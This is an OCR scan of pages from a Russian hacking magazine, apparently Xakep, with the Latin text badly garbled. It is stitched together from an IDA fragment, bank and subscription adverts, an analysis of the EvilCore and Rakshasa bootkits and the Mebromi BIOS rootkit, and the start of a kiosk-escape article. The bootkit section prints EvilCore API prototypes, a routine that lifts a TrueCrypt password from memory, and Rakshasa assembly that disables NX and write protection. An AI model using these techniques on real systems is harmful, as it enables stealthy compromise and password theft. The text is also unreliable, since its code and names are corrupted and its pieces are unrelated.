локальные процедуры в стеке и многое другое. В последних 
версиях имеется встроенный отладчик х86 и АРМ. 

ША, до определенной степени, умеет автоматически 
выполнять анализ кода, используя перекрестные ссылки. 



знание параметров вызовов функций стандартных 
библиотек и другую информацию. Однако вся сила 
его проявляется в интерактивном взаимодействии 
с пользователем. В начале исследования дизассемблер 
выполняет автоматический анализ программы, а затем 
пользователь с помощью интерактивных средств ША 
начинает давать осмысленные имена, комментировать, 
создавать сложные структуры данных и другим образом 
добавлять информацию в листинг, генерируемый 
дизассемблером, пока не станет ясно, что именно 
и как делает исследуемая программа. 



див 



• ѴІЛМЕКАВіиТѴ 
ШМѴНЕАКТ(СѴЕ- 
2010-3970): ЫШ 



КЕеѴѵѵІ: 

* целочисленное 
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ЮАРго— знай в лицо 
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Получать скидки 
в барах, ресторанах и 
магазинах твоего 
города 



Участвовать в акциях и посещать закрытые 
мероприятия для держателей «Мужской Карты» 



Управлять своими счетами, используя систему 
интернет-банка «Альфа-Клик» 



Оформить дебетовую иди кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а также заказав по телефонам: 
в (495) 788-88-78 в Москве 1 8-800-2000- 000 в регионах России (звонок бесплатный} 



МАХІМ А 

нѵигии ЫѴШаі.1 * Л ІшКнІи 



Реклама 



ѵѵѵѵѵѵ.тапсагсіги 



Генеральная лицензия банка России на осуществление банковских операций от 05.03.2012 №1326' 










взлом 



БапіагБаІзига (заІзигаЙгООіѵѵОгт.сот, Іѵѵіиег.соігі/!#/5апіаг_5аІ5ига] 



Аппаратная малварь в 




ЕѴІІ.СОКЕ 
И РАК5НА5А — 
ПРЕПАРИРУЕМ 
СОВРЕМЕННЫЕ 
БУТКИТЫ 



Ѵ^АКЫШС 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



В прошлой статье я рассмотрел 
«железные» эксплойты, которые 
благодаря их специфичности 
и уникальности позволяли пробить 
большинство из существующих 
ныне ОС и систем виртуализации. 
Теперь настало время продолжить 
уже затронутую тему, но с одним 
нюансом — сейчас мы сосредоточимся 
именно на аппаратной малвари. 



ІІМТРО 

Неудивительно, что в наши дни малварь эволюционирует с не- 
бывалой скоростью. Возможно, многие из хардкорных кодеров не 
согласятся со мной, указав на то, что как таковой сцены в наши 
дни не существует и все более или менее изящные поделки уже 
вымерли. Смею с ними не согласиться — авторитетные средства 
массовой информации часто рассказывают нам о том, что вполне 
себе продвинутые разработки в этой сфере все еще продолжают 
появляться и развиваться. Вспомни хотя бы такие названия, как 
Зіихпеі, Бици и РІате. Несомненно, эти образцы малвари заслу- 
женно получили звание самого настоящего кибероружия. Однако 
как они выглядят изнутри? Здесь, по сути, нет ничего нового 
и интересного — все те же сплоиты для удаленного и локального 
повышения привилегий, обычные методики распространения 
по сети и через сменные носители информации, банальное со- 
крытие через патч таблиц 5БТ и 55БТ (гЗ- и гО-руткиты), а также 
инжект в процессы. Кстати, в этой борьбе антивирусы тоже не 
отстают, занося в свои базы правила для эвристического ана- 
лизатора прямо по ходу разворачивающихся событий, значи- 
тельно уменьшая таким образом срок жизни малвари (ведь одни 
и те же техники используются ею из раза в раз]. Здесь перед 
киберпреступниками встает очевидный вопрос — как продлить 
срок годности своих вредоносных поделок? Большинство этих, 
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с позволения сказать, хакеров на время снимают головную боль 
с помощью крипторов и прочих морферов, но из-за неэффектив- 
ности этих методов возвращаются к вопросам маскировки своей 
малвари вновь и вновь. 

Далее я хочу поделиться с тобой своими исследованиями 
особенных вредоносов, которые используют методы сокрытия, 
основанные на багах и фичах СРІІ, ВІ05 и прочего железа жертвы. 
Такая малварь не будет позволять по отношению к себе всяких 
непристойностей со стороны антивирусов. Однако помни, что вся 
описываемая информация предназначена исключительно во благо: 
зная уловки злоумышленников, ты сможешь попробовать от них 
защититься. Не стоит самому заниматься малварью — это уголовно 
наказуемо. Итак, поехали! 

ЕѴИСОКЕ — КОНЦЕПТУАЛЬНЫЙ БУТКИТ 

Первый концептуальный хардварный руткит, создателями кото- 
рого являются два австрийских студента Вольфганг Эттлингер 
(ѴѴоКдапд ЕШіпдег) и Штефан Фибек (БЫап ѴіеЬЬбск), называется 
ЕѵіІСоге. Конкретно эта малварь относится к группе буткитов, так 
как для инициализации она использует инфицирование загру- 
зочной области жесткого диска. Такая техника не нова — история 
зарождения технологии буткитов уходит корнями в далекие 80-е: 
Вгаіп (1986), 5* *опеб (1987), ..., еЕуе Воо*Роо* (2005), ѴЬоо* Кіі (2007), 
ѴЬооІ Кіі 2 (2009), БіопесІ Воо*кі* (2009), ТОІ_4/АІигеоп (2010/11). Для 
маскировки буткит использует интереснейшую технику, которая 
основана на такой фиче микропроцессоров, как 5МР (Буттеігіс 
МиШргосеззіпд). 5МР — это архитектура многопроцессорных 
компьютеров, в которой два или более одинаковых процессора 
подключаются к общей памяти. Большинство современных микро- 
процессоров поддерживают эту архитектуру. 5МР-системы позво- 
ляют любому процессору работать над любой задачей с должной 
поддержкой операционной системы независимо оттого, где в па- 
мяти хранятся данные для этой задачи. Кроме того, 5МР-системы 
могут легко перемещать задачи между процессорами, эффективно 
распределяя нагрузку. Именно благодаря этим особенностям 
микропроцессоров и появляется возможность сокрытия вредоно- 
сов — в первое ядро грузится сама операционная система, а второе 
отключается для ОС и используется только под нужды руткита. Все 
это происходит по следующей схеме: 

1. ОтключаемБМР. 

2. Находим место для размещения буткита — здесь будут проис- 
ходить дальнейшие действия. 

На соответствующем рисунке ты сможешь наглядно увидеть 
процесс отключения 5МР при инициализации системы, инфициро- 
ванной буткитом ЕѵіІСоге. Кстати, при своем размещении ЕѵіІСоге 
учитывает несколько немаловажных моментов: 

1. ОС не должна перезаписать код и да иные буткита в памяти, для 

этого буткитдолжен найти область памяти, не используемой 

операционной системой. 



ТИПЫ БУТКИТОВ 



По типу инфицирования загрузочной области буткиты 
разделяются на два типа: 

• МВР(МазІегЬооІгесогсі) — используют версии ОС ѴѴіпсІоѵѵз 
до ѴізІа,ядро<5.2 (ѴѴіп98/2000/МЕ/І\ІТ/ХР/5егѵ2003); 

• ѴВР(ѴоІитеЬооІгесогсі) — используют версии ОС ѴѴіпсІоѵѵз 
сядром>5.2(ѴізІа/5егѵ2008/7). 

Потипуисполнения: 

• загрузка после ВІ05 до инициализации ОС; 

• загрузка вместе с ВІ05 или вместо ВІ05. 




Отключение БМР и использование ядер СРІІ руткитом под свои нужды 

2. Дляускорения и безопасности в качестве основной памяти бут- 
китдолжен использовать кеш микропроцессора (І_3, в крайнем 
случае — 1_2). 

Здесь следует учесть, что работа большинства буткитов сводит- 
ся к перехвату исключения ІІМТ 1 3Ь (ВІ05 I піегги рі НапсІІег) и пат- 
чингу памяти с исходной информацией, доставленной с жесткого 
диска, в зависимости оттипа загрузки (МВР/ѴВР). Патч представ- 
ляет собой удаление полей/переменных/данных из информацион- 
ных таблиц с целью сокрытия вредоносных действий. Процедура 
патча выглядит следующим образом (визуализацию этой процеду- 
ры смотри на соответствующем рисунке): 

1. Сохраняетсязначениеточки входа, в которой запускается бес- 
конечный цикл, где первоеядро (СР110) выставляется в постоян- 
ноеожидание. 

2. Рассчитывается время для выполнения патча. 

3. В каждом следующем месте вызовов блоков кода вставляются 
бесконечные циклы (ѵѵіпіоасі.ехе— >пІ05кгпІ.ехе). 

4. Восстанавливаетсязначениеточки входа. 

Большинство буткитов при патчинге ОС >= Ѵізіа не могут 
преодолеть РаІсЬОиагсІ (механизм, контролирующий целостность 
системы и призванный уберечь пользователей от руткитов и не- 
корректно работающих программ, вламывающихся в ядро). Так 
как этот механизм выполнен в виде компонента службы ядра ОС 
ѴѴіпсІоѵѵз, ЕѵіІСоге обойдет его без проблем, ибо загрузка проис- 
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ходит до инициализации ОС. Таким же образом ЕѵіІСоге обходит 
еще один механизм защиты контроля целостности кода под на- 
званием Собе Іпіедгііу в х64-системах. Задачей этого механизма 
является проверка валидности сигнатур в исполняемых файлах. 

ВЗАИМОДЕЙСТВИЕ С БУТКИТОМ 

Теперь, рассмотрев способы внедрения и сокрытия руткита, 
перейдем к описанию механизмов взаимодействия с ним. Итак, 
чтобы управлять руткитом, его авторы предусмотрели возмож- 
ность общения с изег тобе при помощи специализированных АРІ - 
функций и банального шелла: 




// Отключение аутентификации ОС 
ѵоіб ес бізаЬІе раззіл/огбСѵоіб’) ; 



// Заморозка 0-ядра микропроцессора и вставка 
// ЗМР-инстрѵкции в пространство физической памяти 
ѵоіб е сЬаІісриѲГ 05_МЕМ* розіі іоп, зЬогІ:* \ 
іпзігисііопЬаскир) ; 



// Разморозка Ѳ-ядра микропроцессора и восстановление 

// инструкций 

ѵоіб ес_гезите_сриѲ( ОБМЕМ* розіііоп. бііогі:* \ 
іпзігис1:іоп_Ьаскир^ 



// ЕѵіІСоге зііеіі зегѵег 
ѵоіб ес зЬеІК юіб) ; 



// Перехват пароля ТгиеСгурі (при его наличии') 
іпі ес _^еі_ігиесгѵрі_рі \/(ѵоіб V. 



// Получение шелла с правами 5У5ТЕМ 

ѵоіб ес зѵзіет зЬеІ НѵоібѴ. 

Шелл представлен юзермод-приложением, которое имеет не- 
посредственный доступ к адресному пространству СРШ и может 
управлять потоками внутри ядра СРІІО. Управление потоками про- 
изводится через рассылку специально сформированных пакетов 
с определенной сигнатурой для поиска данных буткита, которые 
он заранее поместил в адресное пространство микропроцессора 
(ІпбРгосеззогТехіБеагсЬ, 2пбРгосез50гТехі5еагсЫ: 

іпі: таіп( іпі аг^с. сЬаг *аг§ѵ[]) { 



// Сигнатура выходного блока данных 

сЬаг оиізіг[] = " пбРгосеззогТехіБеагсЬ#! ?&$%#оиіриі'' ; 



// Сигнатура входного блока данных 

сЬаг іпзііг [ ] = " пбРгосеззогТехіБеагсЬ#! ?&$%#іприіххххх" ; 



риіз("і\/аіііп§ -Рог сриі іо зеагсЬ зігіп^з"); 



ыЬі1е (*сіг1оиі == '2' || *сіг1іп == ' 2 ' ) { 

// Даем время процессору ѲЛ с для поиска строк 

БІеер(ІѲѲ) ; 

іриіс( ' . ' „ зібоиі) ; 

} 



ШЕЛЛ ЕѴИСОРЕ 

Сам шелл имеет несколько основных команд, которые разработ- 
чики и представили на конференции ІМіщаСоп 2011 в качестве 
демонстрационных возможностей руткита ЕѵіІСоге: 

1. Тсрѵѵ — позволяет перехватить пароль от непобедимой систе- 
мы шифрования дисков ТгиеСгурі Для этого ищется сигнатура 
«ТРІб Е\х1 1 #Еі», которая располагается поадресу0х90010. Если 
сигнатура присутствует, то копируется фраза с 0x90026 и все это 
дело перемещается в адресное пространство, доступное пользо- 
вательскому шеллу: 

іпі ес ^еі ігиесгѵрі _ріл/(ѵоібЧ{ 
ес_тоѵе_ігот_05( (05_МЕМ*) 0x90010 , іс_ітр., ТС_51С_1_Е1\1) ; 
іі(зігпед(іс_зіе. ісітр. ТС_5І(з_І-ЕІ\ОН 

ес_тоѵе_ігот_05( (О5_МЕМ*)0х90026 : , іс_разз., \ 
МАХ_ТКІІЕСКѴРТ_І_ЕІ\І) ; 
геіигп 1; 

} 

геіигп 0 ; 

} 

2. Морѵѵ — позволяетобходитьаутентификацию на сторонеопе- 
рационной системы: ѵѵіпіодоп.ехе, « Вы пол нить от имени...» (она 



^ ■ 

МЕВРОМІ — КИТАЙСКИЙ ВІОБ-РУТКИТ 



Как все новое является хорошо забытым 
старым, так и вирусы, перезаписывающие 
ВІ05 НазЬ, известны еще с истоков 
зарождения ПК. В последнее время 
китайские хакеры начали проявлять немалый 
интерес к промышленному шпионажу, в связи 
с чем и породили большое количество 
интереснейших образцов так называемого 
кибероружия. Одной из таких разработок 
является буткит МеЬготі. Второго сентября 
прошлого года китайская компания СІіЬоо 360 
сообщила о новом вирусе с ВІОБ-руткитом, 



обнаруженном на китайских компьютерах. 
Эта новость вызвала огромный интерес 
специалистов по безопасности, потому 
что в полевых условиях такие программы 
не регистрировались со времен концепта 
ІсеІ_огб в 2007 году. Данный вирус четко 
нацелен на китайские системы мониторинга 
государственных объектов. При работе 
он проверяет присутствие антивирусных 
программ Різіпд Апііѵігиз и біапдтіп КѴ 
Апііѵігиз, которые используются во всех 
ответственных структурах Китая. Чтобы 



получить возможность модифицировать 
ВІОБ, МеЬготі использует два способа: 
либо запускает библиотеку НазЬ.бІІ, 
которая загружает драйвер Ьіоз.5у5, либо 
перехватывает Ьеер.эуз и переписывает 
его собственным кодом Ьеер.зуз, а потом 
восстанавливает оригинальный код файла. 
Эта разработка примечательна тем, что 
наделала немало шума в международной 
политике — китайские хакеры сливали 
информацию о секретных объектах страны 
спецслужбам Америки. 
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Зловред: запуск во время 
загрузки, хранится только 
в памяти 




Вооікіі 




Незловредный 
Содержится 
в прошивке 
ВІОЗ'а КакзЬаза 



Архитектура КакзНаза полностью РІЮ и состоиттолько из СПО 



же РЦ) N А5), ІосаІ пеіѵѵогкзбагез и так дал ее. Для выполнения 
этой задачи руткит ищет код образа тзѵ1_0.сІІІ в памяти ЬооІ 
тзѵі О! МзѵрРаззѵѵогсІ Ѵаіісіаіе и патчиткод валидациитак, чтобы 
всегда возвращалосьзначениеТРІІЕ. Таким образом, все по- 
следующиедействия будутавтоматически выполняться с любым 
введенным паролем, а то и без него:). 

3. Бузіет — позволяет получать зЬеІІ с привилегиями 5Ѵ5ТЕМ. 

Для реализации этой задачи производится патчингѵѵіпіодоп. 
ехе, который всегда запускается с привилегиями 5У5ТЕМ. За- 
дачей патча является выполнение командного интерпретатора 
ѴѴіпсІоѵѵз — стсі.ехе, который, в свою очередь, автоматически 
унаследуетправа отсвоего предка (ѵѵіпіодоп.ехе). Для вызова 
интерпретатора австрийские студенты предусмотрели «магиче- 
скую» комбинацию из пятикратного последовательного нажатия 
клавиши<5ЫК>. 



1. Устойчивость(нижебудутподробнорассмотрены принципы, на 
которых основывается выживание буткита в системах с высоким 
уровнемзащиты). 

2. ЗіеаШі — полная невидимость вледствиетого, что код буткита не 
записывается нажесткий диск. 

3. РогІаЫе — переносимость, заключающаяся вунификации кода 
буткита для всех существующих ныне ОС. 

4. Ретоіеассезз/Ретоіе ирсіаіез — возможность удаленного 
управления компонентами РакзЬаза и их обновления. 

5. Сгозз пеіѵѵогк регіітіеіегз — обход Ю5/ІР5 и файрволов за счет 
легитимной пересылки данных. 

6. РІЮ — обход анти вирусных за щит. ІМи^ваісІ :). 

РакзЬаза был создан на базе программного обеспечения с от- 
крытым исходным кодом. В частности, использовалась комбинация 
СПО СогеЬооІ и ЗеаВІОЗ, являющихся альтернативными продукта- 
ми, работающими на различных материнских платах от многих про- 
изводителей. Также был использован код прошивки для загрузки 
по сети от компании ІРХЕ. Все эти компоненты были модифициро- 
ваны таким образом, чтобы руткит не выдавал своего присутствия 
на системе во время процесса загрузки. В частности, СогеЬооІ 
способен использовать пользовательские заставки для имитации 
некоторых ВІ05. Имитации и прочие спуфинг-заставки (имитация 
парольной аутентификации многих защиттипа ТгиеСгурІ, ВШоскег, 
МОЕ) представляют собой отдельный компонент буткита — рауіоаб 
(полезная нагрузка), который загружается по протоколу НТТР5, об- 
ламывая таким образом файрволы и прочие Ю5/ІР5 на ходу. 

ВОЗМОЖНОСТИ РАК5НА5А 

Функционал описываемого буткита выглядит впечатляюще. 

КетоѵеМХЬіІ>ехесиІаЫеІіеар/5Іаск— отключает защиту ЫХЬіІ 
микропроцессора, делая кучу и стек исполняемыми (смотри АМ064 
АгсЫіесІиге Ргодгаттег'з тапиаі — ѵоіите 2, Весііоп 3.1.7: Ехіепбесі 
Реаіиге ЕпаЫе Редізіег). 



ЕѴИСОРЕ — ПОДВЕДЕНИЕ ИТОГОВ 

Очевидно, что описываемый буткит имеет не только плюсы, но 
и минусы. Из основных минусов можно отметить отключение одно- 
го ядра СРІІ и, как следствие, снижение производительности це- 
лой системы. Однако проблема видимости ядра СРІІ решается пат- 
чем ядра ОС. Вопрос производительности при правильной работе 
руткита также становится незначительным. Как ты уже понял из 
всего сказанного, ЕѵіІСоге обладает довольно продвинутыми воз- 
можностями обхода средств аутентификации, перехвата паролей 
и маскировки. Все это позволяет ему оставаться невидимым для 
операционной системы, средств отладки и антивирусов, а также 
обходить все существующие защитные механизмы на сегодняшний 
день. Это делает его актуальной угрозой для всех существующих 
сейчас антивирусных решений. 

РАК5НА5А 

Совсем недавно на конференции йЕР СОИ Джонатан Броссар 
РопаіЬап ВгоззагсІ) представил довольно интересный концепт 
хардварной малвари. Опубликованный РоС бэкдора имел способ- 
ность перезаписать ВІ05 и скомпрометировать операционную 
систему компьютера во время процесса загрузки, не оставляя 
при этом никаких следов на жестком диске. Также в ходе атаки 
у вируса есть возможность инфицирования прошивки и других 
периферийных устройств, в том числе сетевой карты или Сй- 
привода. Автор буткита (точнее, даже ромкита, РОМкіі) утверж- 
дает, что ему удалось создать оружие массового поражения 
из-за неэффективности и бажности архитектуры х86: «ТЬе х86 
агсЬіІесІиге із ріадиесі Ьу Іедасу. Соѵегптепіз кпоѵѵ. ТЬе гезі оі іЬе 
іпсіизігу: по* * зо тисЬ». 

Итак, РакзЬаза имеетуникальные особенности, которые делают 
его не только бэкдором высокого класса, но еще и универсальным 
оружием против всех существующих в настоящее время ІТ-систем: 



:РоС РізаЬІе № Ьі1= (і-Р зиррогЕесО 
;^е1: Ііі^Ііег -Рипсіііоп зиррогііесі Ьѵ еах 
тоѵ еах., 0x80000000 



;пеесІ атсі Кб ог ЬеЛег (апуЫііп^ >= 1997... зііоиісі Ье ок) 



МЕХАНИЗМ РАБОТЫ РАТСН6УАВ0 



1. Вычисляются контрольныесуммы критическихобластей и ком- 
понентовядра: 

• 550Т(5узІет5егѵісе0езсгірІогТаЫе) — системнаятаблица 
дескрипторов сервисов ядра; 

• ОРТ (ОІоЬаІ ОезсгірІогТаЫе) — глобальная таблица дескрипто- 
ров, служебная структура данных в архитектуре х86, опреде- 
ляющая глобальные (общие для всехзадач) сегменты; 

• ЮТ (ІпІеггирЮезсгірІогТаЫе)— таблица векторов прерываний, 
служебная структура данных предназначена для того, чтобы 
определить корректный ответ на прерывания и исключения; 

• Бузіет ітадез (піозкгпі.ехе, псііз.зуз, ЬаЫІІ) — образы систем- 
ныхфайловна носителе; 

• РгосеззогМБРЫзузсаІІ) — моделезависимые регистры, специ- 
альныерегистры процессоровархитектурых86/х64, наличие 

и назначение которых варьируется от модели к модели процес- 
сора. 

2. Если контрольныесуммы файловсовпадают, продолжается нор- 
мальная загрузка ОС, иначе производится аварийный останов 
системы (В500). 
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взлом 



сриісі 

ст р е ах. 0x80 00000 1 



:пеесІ а1= Іеазі: -РипсЫоп 0x80000001 
ЗЬ по1:_5иррог1:есІ 

;§е1: Ргосеззог ІгѵРо апсі Реаііиге Віііз 

тоѵ еах .0x80000001 

сриісі 



;ІМХ Ьіі: І5 зиррогііесі? 

Ы: есіх.,20 

]пс по1=_5иррог1=есІ 



•.ехіепсіесі -Реаііиге ге^ізігег (ЕРЕГО 
тоѵ есх. 0хсѲѲѲѲ08Ѳ 



;геасІ М5К 
гсітзг 



;сІІ5аЫе ІМХ (ЕРЕК ІМХ) // Ы=г = Ьіі: іѳбіі апсі гезеі: 
Ы=г еах. 11 



;ыгі1=е М5К 
ыгтзг 



Маке еѵегу тарріпд +ѴѴІП гіпдО — делает возможным запись 
в доступные РО участки памяти с помощью установки флага ѴѴ+ 
и обхода защиты ѴѴгііе Ргоіесі (смотри I піеі Мапиаіз — Ѵоіите ЗА, 
Зесііоп 2.5). 

;РоС 32Ь ѵегзіоп: 

тоѵ еах^сгѲ 

апсі еах^ѳх-р-р-ре-р-р-р-р 

тоѵ сг0,еах 



;РоС 64Ь ѵегзіоп: 

тоѵ гах л сг0 

апсі гах^ѳх-р-р-ре-р-р-р-р 

тоѵ сгѲ^гах 

КетоѵеСРІІирсІаІезІтісгососІез)— удаляет микрообновле- 
ния СРІІ, в которых содержатся инструкции исправления ошибок 
в микропроцессорах (вспоминаем хард варные сплоиты): 



гт -гР ./согеЬооі/тісгососІез/ 

РетоѵеапІі-5ММргоІесІіоп5>депегісІосаІгооІехрІоіІ— уда- 
ляет за щиту 5ММ, которая препятствует повышению привилегий на 
целевой системе с помощью локальных эксплойтов. Исходя из того, 
что написано в Іпіеі 828456/828450І_/828456Ѵ0гарЫсзапсІ Метогу 
СопігоІІегсІаіазЬееІз, отключениезащиты в СогеЬооІ сводится кза- 
тиранию поляЗММ 0_1_СК и его значения І\ІОР(0х90). 

0ізаЫеА5І_П — отключениезащиты АЗЬР, задача которой заклю- 
чается в усложнении эксплуатирования уязвимостей за счет рандо- 
мизации адресов памяти (специфична для каждой ОС и архитектуры). 

Вооікііііпд (тосШіесІ Коп-Ьооірауіоасі) — продвинутый буткит- 
функционал, расширяемый за счет динамических базонезависимых 
модулей. 

Кедепегаііоп — буткитспособен самостоятельно восстанавли- 
вать себя на зараженной машине. Это возможно из-за особенностей 
современной архитектуры компьютера, предоставляющей каждому 
периферий ному устройству равные права доступа к оперативной 
памяти. 

Здесь также стоит упомянуть и сценарии атаки буткита 
ПакзИаза: 

1. Локальное протроянивание через бота-посредника с помощью 
локальных сплоитов для повышения привилегий. 

2. Удаленное протроянивание с помощью архитектурных уязвимо- 
стей в сетях и сетевом оборудовании (по сути, функционал червя), 
в качестве примера можно привести СѴЕ-2010-0104. 

Неуловимость вируса обеспечивается тем, что прошивка ІРХЕ, 
работающая на сетевой карте, загружается до операционной 
системы, то есть способна заразить ее до запуска антивирусных 
продуктов. И последняя убойная фишка РакзЬаза заключается 
в том, что он использует іРХЕ-прошивку для загрузки с удаленного 
компьютера, загружая себя таким образом в память при каждом 
ребуте компьютера уже без поддержки сети. 

01ІТР0 

Подводя итоги, хочется отметить, что и ЕѵіІСоге и РакзЬаза де- 
монстрируют уязвимости архитектуры на уровне проектирования 
платформ. Не знаю как, но каким-то волшебным образом Джонатан 
поддержал мои взгляды на безопасность существующих систем, 
о которой я говорил во многих своих предыдущих статьях, подчер- 
кивая именно архитектурные уязвимости, так что ѵѵеісоте Ьаск Іо 
1Ье зесигііу ІеѵеІ оі 1997 :). ПЕ 



ВОЗМОЖНЫЕ ПРОБЛЕМЫ 
ПРИ ЗАГРУЗКЕ БУТКИТА 



• Ограниченность. Единственный способ загрузки буткита — 
это установка хуков. 

• Невозможность загрузки буткита после загрузки ядра ОС 
(прерывания В 105 напрямую вызывать уже не получится). 
Здесь есть варианте патчингом ядра и загрузочных драй- 
веров, нопри простейшей проверке контрольной суммы 
системных файлов ОС буткит будет обнаружен в кратчайшие 
сроки. 

• Возможность легкого обнаружения. При сравнении паттер- 
нов оригинал ьной и инфицированной буткитом загрузочной 
области различия сразу бросятся в глаза. Как следствие, все 
это непотребство обнаружится даже при помощи древнего 
сигнатурного сканера. 




• Слайды 

презентации ЕѵіІ- 
Соге: Ы] 5; 

• демонстрационное 
видео ЕѵіІСоге: уР 
тео.сот/25372729: 

• слайды Джонатана 
Броссара, 
подготовленные 
для БЕР СОЫ: Ьіі Іу/ 
0Ргке2: 

• видеопрезентация 
побуткиту Рак5Ьа5а: 

.Іѵ/5ВиЬеК: 

• конструирование 
настоящей железной 
малвари на примере 
кейлоггера: ЬіІ.Іу/ 
Р)ѵеиК . 



Блок-схема работы 5ГіеІІ5егѵег'а ЕѵіІСоге 
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ПОДПИШИСЬ! 



8-800-200-3-999 

+7 (495) 663-82-77 (бесплатно) 



Редакционная подписка без посредников — это 
гарантия получения важного для Вас журнала 
и экономия до 40% от розничной цены в киоске. 







6 номеров — 1194 руб. 
12 номеров — 2149 руб. 



6 номеров — 810 руб. 

12 номеров — 1499 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 894 руб. 

12 номеров — 1699 руб. 







6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 599 руб. 

1 2 номеров — 1188 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 810 руб. 

12 номеров — 1499 руб. 




3 номера — 630 руб. 

6 номеров — 1140 руб. 




6 номеров — 895 руб. 
12 номеров — 1699 руб. 



’Шрсяш 




6 номеров — 690 руб. 

12 номеров — 1249 руб. 




6 номеров — 775 руб. 

12 номеров — 1399 руб. 






6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 950 руб. 

12 номеров — 1699 руб. 



(дате)ІаіШ 

зНор.дІс.ги 











взлом 



Дима Ч. 




КАК ОТКРЫВАЮТСЯ 

КИПГІГИ Аи - уоик ІМТЕЯЫЕТ КІ05К5 
І\ГІОѴГ\П АРЕ ВЕЮЫ6 ТО Ы5 









Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 




Сегодня интернет-киоски используются 
во всех общественных местах, особенно 
популярны они на вокзалах, в аэропортах 
и магазинах. Попробуем разобраться, 
насколько защищены подобные терминалы, 
и попытаемся обойти установленные 
владельцами ограничения. 



КИОСКИ? 

Интернет-киоски представлены в нашей стране различными тер- 
миналами, с помощью которых можно оплатить мобильную связь, 
услуги ЖКХ, кредиты, перевести средства на интернет-кошельки 
и так далее. Как правило, такие терминалы имеют дисплей с тач- 
скрином, который отображает развернутый на весь экран браузер. 

На западе интернет-киоски распространены гораздо силь- 
нее. Там они встречаются буквально везде, а их функциональные 
возможности значительно шире: регистрация на рейсы самолета, 
туристическая информация, букинг гостиниц и отелей, онлайн- 
покупки и биржи труда. Пользователям при этом доверяют чуть 
больше, и нередко в таких киосках может присутствовать полно- 
ценная клавиатура и мышь. 
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Как открываются киоски 




Если открыть в браузере киоска адрес Шр://ікаІ.Ьа.скесІ.пеІ, появляется интерфейс ІКАТ с кучей инструментов 



Ответ на вопрос, почему интернет-киоски 
могут быть интересны разного рода атакую- 
щим, вероятно, не должен вызывать затрудне- 
ний. Злоумышленник, контролирующий работу 
какого-либо платежного терминала, может 
получить большое разнообразие интересной 
информации. Но мы-то с тобой носим белые 
шляпы, именно поэтому рассматриваем игры 
с интернет-киосками как отличный таймкил- 
лер во время нудной пересадки в аэропорту, 
например. Стоит сразу отметить, что во всех 
атаках на киоски нет никакого госкеі зсіепсе, 
все описанное ниже достаточно примитивно 
и просто. Однако даже такие, казалось бы, 
очевидные вещи до сих пор работают в совре- 
менных информационных системах, и от этого 
становится слегка... неуютно. 

ТИПИЧНЫЙ ИНТЕРНЕТ-КИОСК 
В ПОДРОБНОСТЯХ 

Начнем с железа. Как правило, терми- 
нал — это обычный компьютер, заточенный 
в некий «жесткий» корпус, который защи- 
щает аппарат от воздействий окружающей 
среды, непогоды и вандалов. Доступ ко всем 
ненужным пользователю девайсам ограни- 
чивается; так, наибольшее распространение 
получили устройства, у которых во внешний 
мир выставлен лишь сенсорный экран, по- 
зволяющий отказаться от использования 
клавиатуры и мыши. В зависимости от функ- 
циональной необходимости, пользователю 
могут быть доступны ІІБВ-порты и слоты для 
карт памяти (загрузить и распечатать фото- 
графии, например). 



Если киоск принимает банкноты, то, скорее 
всего, к нему подключена также видеокамера 
и ряд датчиков, срабатывающих на удары и 
попытки открыть корпус железяки. 

Большинство терминалов работает под 
управлением ОС ѴѴіпсіоѵѵз, существуют, 
конечно, І_іпих/В50-киоски, но их немного. 

На данный момент на рынке представлено 
около 50 компаний, предлагающих свое ПО в 
качестве оболочки для киоска, но почти все 
они работают одинаково. 

Ограничивают функционал хоста: 

• отключают функционал ОС, который может 
скомпрометировать систему; 

• ограничивают доступ ккомандной строке; 

• ограничивают возможность для за грузки 
файлов; 

• используютпаііѵе АСІ_. 

Разворачиваютбраузер на весьэкран: 

• пользователькиоска не покидаетпределы 
браузера; 



Аппаратная клавиатура киоска 



• нет возможности свернуть, закрыть браузер; 

• панель«Пуск»,трей и прочее скрываются. 

Есть у ПО для киосков и свои блэклисты, 
например, при попытке вызвать окна с за- 
головками «5аѵе Бііе...», «РгіпІ», «Ореп» они 
будут тут же закрыты. 

Помимо этого, ставятся хуки на вызов по- 
тенциально опасных АРІ-функций: КіІІРгосеззО, 
АІІосСопзоІеО, ОеіСоттапсНіпеѴѴО; браузер 
(а это чаще всего ІЕ) работает в режиме НідЬ 
Бесигііу 2опе, при котором запрещается загрузка 
файлов, работа АсІіѵеХ-элементов, попапы. 

Ватчдог также имеет место быть, через 
определенные промежутки времени он прове- 
ряет список запущенных процессов, восста- 
навливает необходимые и убивает несанкцио- 
нированные. 

Ограничивается работа клавиатуры и 
мыши. Блокируются все популярные хоткеи: 

• <СігІ> + <5ЫК> + <Ебс> (диспетчер задач) 

• <СігІ> + <АІІ> + <йеІ> (диспетчер задач) 

• <АК> + <ТаЬ> (переключение между окнами) 

• <СігІ> + <Езс> (меню «Пуск») 

• <АК> + <Е4> (закрыть окно) 

Переназначается или отключается функ- 
ционал ряда клавиш (<СігІ>, <АІІ>, <Е1-Е12>). 
Также все эти клавиши могут просто-напросто 
отсутствовать на клавиатуре. Щелчки правой 
кнопкой мыши (если она есть) перестают рабо- 
тать, либо контекстное меню кастомизировано. 

Как можно заметить, ПО пытается сделать 
все, чтобы ограничить работу пользователей, 
оставив только минимально необходимый 
функционал. Именно эти ограничения и по- 
пытаемся обойти. 

МАДАМ, ДАВАЙ Я СХОЖУ И КИНУ 
ТЕБЕ ДЕНЕГ НА ТЕЛЕФОН 

Как известно, идеально написанных программ 
не бывает, идеальной защиты не существует. 
Задача — используя урезанный функционал 
оболочки, доступный для работы, добраться до 
командной строки, обойдя киоск-джейл. Так 
как большинство из них полагается на блэкли- 
сты, это не такая уж и трудная задача. 

Собственно векторов работы с киоском не 
так уж и много: 

• графический интерфейс киоска; 

• клавиатура/мышь, если есть; 

